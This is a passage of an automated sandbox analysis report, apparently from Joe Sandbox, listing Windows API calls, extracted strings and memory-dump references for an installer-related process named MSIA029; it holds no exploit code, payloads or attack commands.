                                                                                                                                                                                                                                                  • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,00F35E18,80A20388,?), ref: 00F35EB4
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,TokenIntegrityLevel,00000000,00000000,00F35E18,80A20388,?), ref: 00F35EBE
                                                                                                                                                                                                                                                  • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),?,00000000,00000000,?,TokenIntegrityLevel,00000000,00000000,00F35E18,80A20388,?), ref: 00F35F1A
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: InformationToken$ErrorLast
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2567405617-0

Control-flow Graph (figure not reproduced; legend: Executed / Not Executed; entry block 306 at f670bb-f670c6)
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000008,?,?,?,00F6596A,00000001,00000364,?,00000006,000000FF,?,00F56CE7,00000000,00F63841,00000000), ref: 00F670FC
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AllocateHeap
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1279760036-0

Control-flow Graph (figure not reproduced; legend: Executed / Not Executed; entry block 477 at f352f0-f353a8)
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetWindowsDirectoryW.KERNEL32(?,00000104,00000000,?,?,?,?,?), ref: 00F3549C
                                                                                                                                                                                                                                                  • GetForegroundWindow.USER32(00000000,?,?,?,?,?), ref: 00F3551D
                                                                                                                                                                                                                                                  • ShellExecuteExW.SHELL32(?), ref: 00F35601
                                                                                                                                                                                                                                                  • ShellExecuteExW.SHELL32(?), ref: 00F35637
                                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(Kernel32.dll,GetProcessId,?,?,?,?,?,?), ref: 00F3567C
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00F35685
                                                                                                                                                                                                                                                  • AllowSetForegroundWindow.USER32(00000000), ref: 00F3568B
                                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(Kernel32.dll,GetProcessId,?,?,?,?,?,?), ref: 00F356AB
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00F356AE
                                                                                                                                                                                                                                                  • Sleep.KERNEL32(00000064,?,?,?,?,?,?), ref: 00F356CA
                                                                                                                                                                                                                                                  • EnumWindows.USER32(00F35830,?), ref: 00F356DF
                                                                                                                                                                                                                                                  • BringWindowToTop.USER32(00000000), ref: 00F356F4
                                                                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?), ref: 00F35711
                                                                                                                                                                                                                                                  • GetExitCodeProcess.KERNEL32(?,?), ref: 00F3571B
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Window$AddressExecuteForegroundHandleModuleProcShellWindows$AllowBringCodeDirectoryEnumExitObjectProcessSingleSleepWait
                                                                                                                                                                                                                                                  • String ID: %s\System32\cmd.exe$.bat$.cmd$/C ""%s" %s"$Directory:<$FilePath:<$GetProcessId$Hidden$Kernel32.dll$Parameters:<$ShellExecuteInfo members:$Verb:<$Visible$Window Visibility:$open$runas
                                                                                                                                                                                                                                                  • API String ID: 697762045-2796270252
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,00000001,?), ref: 00F3CBB6
                                                                                                                                                                                                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00F8E6D0,00000800), ref: 00F3CBD3
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: OpenQueryValue
                                                                                                                                                                                                                                                  • String ID: /DIR $/DontWait $/EnforcedRunAsAdmin $/HideWindow$/LogFile$/RunAsAdmin
                                                                                                                                                                                                                                                  • API String ID: 4153817207-482544602
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 00F657CC: GetLastError.KERNEL32(?,00000008,00F6AD4C), ref: 00F657D0
                                                                                                                                                                                                                                                    • Part of subcall function 00F657CC: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00F65872
                                                                                                                                                                                                                                                  • GetACP.KERNEL32(?,?,?,?,?,?,00F642D9,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00F6DEE5
                                                                                                                                                                                                                                                  • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00F642D9,?,?,?,00000055,?,-00000050,?,?), ref: 00F6DF10
                                                                                                                                                                                                                                                  • _wcschr.LIBVCRUNTIME ref: 00F6DFA4
                                                                                                                                                                                                                                                  • _wcschr.LIBVCRUNTIME ref: 00F6DFB2
                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 00F6E073
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
                                                                                                                                                                                                                                                  • String ID: utf8
                                                                                                                                                                                                                                                  • API String ID: 4147378913-905460609
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,80A20388,?), ref: 00F338CB
                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00F3390B
                                                                                                                                                                                                                                                  • Process32FirstW.KERNEL32(?,00000000), ref: 00F3395F
                                                                                                                                                                                                                                                  • OpenProcess.KERNEL32(00000410,00000000,?), ref: 00F3397A
                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00F33A8E
                                                                                                                                                                                                                                                  • Process32NextW.KERNEL32(?,00000000), ref: 00F33AA2
                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00F33AF0
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CloseHandle$Process32$CreateFirstNextOpenProcessSnapshotToolhelp32
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 708755948-0
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: __floor_pentium4
                                                                                                                                                                                                                                                  • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                                                                                                  • API String ID: 4168288129-2761157908
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,2000000B,00F6E8D1,00000002,00000000,?,?,?,00F6E8D1,?,00000000), ref: 00F6E64C
                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,20001004,00F6E8D1,00000002,00000000,?,?,?,00F6E8D1,?,00000000), ref: 00F6E675
                                                                                                                                                                                                                                                  • GetACP.KERNEL32(?,?,00F6E8D1,?,00000000), ref: 00F6E68A
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: InfoLocale
                                                                                                                                                                                                                                                  • String ID: ACP$OCP
                                                                                                                                                                                                                                                  • API String ID: 2299586839-711371036
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _swprintf$FreeLocal
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2429749586-0
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 00F657CC: GetLastError.KERNEL32(?,00000008,00F6AD4C), ref: 00F657D0
                                                                                                                                                                                                                                                    • Part of subcall function 00F657CC: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00F65872
                                                                                                                                                                                                                                                  • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 00F6E894
                                                                                                                                                                                                                                                  • IsValidCodePage.KERNEL32(00000000), ref: 00F6E8DD
                                                                                                                                                                                                                                                  • IsValidLocale.KERNEL32(?,00000001), ref: 00F6E8EC
                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00F6E934
                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00F6E953
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 415426439-0
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: _strrchr
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3213747228-0
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00F533B4
                                                                                                                                                                                                                                                  • IsDebuggerPresent.KERNEL32 ref: 00F53480
                                                                                                                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00F534A0
                                                                                                                                                                                                                                                  • UnhandledExceptionFilter.KERNEL32(?), ref: 00F534AA
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 254469556-0
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 00F3C630: InitializeCriticalSectionEx.KERNEL32(?,00000000,00000000,80A20388,?,00F73D30,000000FF), ref: 00F3C657
                                                                                                                                                                                                                                                    • Part of subcall function 00F3C630: GetLastError.KERNEL32(?,00000000,00000000,80A20388,?,00F73D30,000000FF), ref: 00F3C661
                                                                                                                                                                                                                                                  • IsDebuggerPresent.KERNEL32(?,?,00F88AF0), ref: 00F3D0D8
                                                                                                                                                                                                                                                  • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,00F88AF0), ref: 00F3D0E7
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00F3D0E2
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CriticalDebugDebuggerErrorInitializeLastOutputPresentSectionString
                                                                                                                                                                                                                                                  • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                                                                                                                                                                                  • API String ID: 3511171328-631824599
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 00F657CC: GetLastError.KERNEL32(?,00000008,00F6AD4C), ref: 00F657D0
                                                                                                                                                                                                                                                    • Part of subcall function 00F657CC: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00F65872
                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00F6E28B
                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00F6E2D5
                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00F6E39B
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: InfoLocale$ErrorLast
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 661929714-0
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00F56F13
                                                                                                                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00F56F1D
                                                                                                                                                                                                                                                  • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00F56F2A
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3906539128-0
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • LoadResource.KERNEL32(00000000,00000000,80A20388,00000001,00000000,?,00000000,00F74460,000000FF,?,00F3474D,00F33778,?,00000000,00000000,?), ref: 00F345DB
                                                                                                                                                                                                                                                  • LockResource.KERNEL32(00000000,?,00000000,00F74460,000000FF,?,00F3474D,00F33778,?,00000000,00000000,?,?,?,?,00F33778), ref: 00F345E6
                                                                                                                                                                                                                                                  • SizeofResource.KERNEL32(00000000,00000000,?,00000000,00F74460,000000FF,?,00F3474D,00F33778,?,00000000,00000000,?,?,?), ref: 00F345F4
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Resource$LoadLockSizeof
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2853612939-0
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetTimeZoneInformation.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00F67F64,00000000,00000000,00000000), ref: 00F67E23
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: InformationTimeZone
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 565725191-0
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00F684B8,?,?,00000008,?,?,00F714E4,00000000), ref: 00F686EA
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ExceptionRaise
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3997070919-0
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00F535BF
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: FeaturePresentProcessor
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2325560087-0
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: 0
                                                                                                                                                                                                                                                  • API String ID: 0-4108050209
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 00F657CC: GetLastError.KERNEL32(?,00000008,00F6AD4C), ref: 00F657D0
                                                                                                                                                                                                                                                    • Part of subcall function 00F657CC: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00F65872
                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00F6E4DE
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorLast$InfoLocale
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3736152602-0
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 00F657CC: GetLastError.KERNEL32(?,00000008,00F6AD4C), ref: 00F657D0
                                                                                                                                                                                                                                                    • Part of subcall function 00F657CC: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00F65872
                                                                                                                                                                                                                                                  • EnumSystemLocalesW.KERNEL32(00F6E237,00000001,00000000,?,-00000050,?,00F6E868,00000000,?,?,?,00000055,?), ref: 00F6E183
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2417226690-0
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 00F657CC: GetLastError.KERNEL32(?,00000008,00F6AD4C), ref: 00F657D0
                                                                                                                                                                                                                                                    • Part of subcall function 00F657CC: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00F65872
                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00F6E453,00000000,00000000,?), ref: 00F6E6E5
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorLast$InfoLocale
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3736152602-0
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 00F657CC: GetLastError.KERNEL32(?,00000008,00F6AD4C), ref: 00F657D0
                                                                                                                                                                                                                                                    • Part of subcall function 00F657CC: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00F65872
                                                                                                                                                                                                                                                  • EnumSystemLocalesW.KERNEL32(00F6E48A,00000001,?,?,-00000050,?,00F6E82C,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 00F6E1F6
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2417226690-0
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 00F61C9A: EnterCriticalSection.KERNEL32(-00F8DE50,?,00F63576,?,00F8A078,0000000C,00F63841,?), ref: 00F61CA9
